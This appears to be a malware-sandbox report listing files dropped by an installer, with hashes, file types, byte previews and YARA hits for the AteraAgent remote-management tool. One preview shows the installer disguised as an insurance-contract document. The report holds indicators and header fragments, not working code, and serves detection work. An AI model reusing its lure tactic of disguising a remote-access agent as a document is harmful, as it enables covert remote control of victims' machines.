                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI77D8.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI7BC1.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI7BC1.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI7BC1.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI7BC1.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI7BC1.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA1C8.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA999.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):435990
                                                                                                                                                                                                                                        Entropy (8bit):6.651510585476378
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:st3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4Kse:czOE2Z34KGzOE2Z34K5
                                                                                                                                                                                                                                        MD5:A7F7E80BEA31900A7A076B547A6F0360
                                                                                                                                                                                                                                        SHA1:4AB2F2DD53944519091D4EDFE4BC851F52E13F8B
                                                                                                                                                                                                                                        SHA-256:6E913A86AD8D456041A7B4BB9DC0F0C64BC79CE6A3EC54B9B19D3C81F92AB447
                                                                                                                                                                                                                                        SHA-512:847A33DFD284E89F1605271BDD4BFD759D227ED119895E0DA4B482E5055FC22CA36D1F5B60D31087F02D4D554B0A5763EC4B4291C1C4D9D7652A590817CCCBD6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIA999.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@.e.Y.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent&.Documento_Contrato_Seguro_25105476.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}....&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}c.&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}............StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P.........................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA9D9.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIAB51.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIAC6B.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIC40B.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):437217
                                                                                                                                                                                                                                        Entropy (8bit):6.647812051461046
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Et3jOZy2KsGU6a4Kspt3jOZy2KsGU6a4Ks7:0zOE2Z34K+zOE2Z34Ka
                                                                                                                                                                                                                                        MD5:B0B27D887E908664B8429C7A6679E5CC
                                                                                                                                                                                                                                        SHA1:B604E42405DBABE42056858F78175AB207810D55
                                                                                                                                                                                                                                        SHA-256:A61B3D4E06BA15AD453E8633A7369FDB849CCC97A44EA494C81ADCF836B3F2F5
                                                                                                                                                                                                                                        SHA-512:FC50C52D827F477CDFECACCAC75915363920FF7C8C49CC14D8D81FF97B14A42A9933F88C55CAC1A896177886F94D352403523256CBB60E1E9E5ECF64E9A55CDF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIC40B.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@.e.Y.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIC41B.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIC499.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

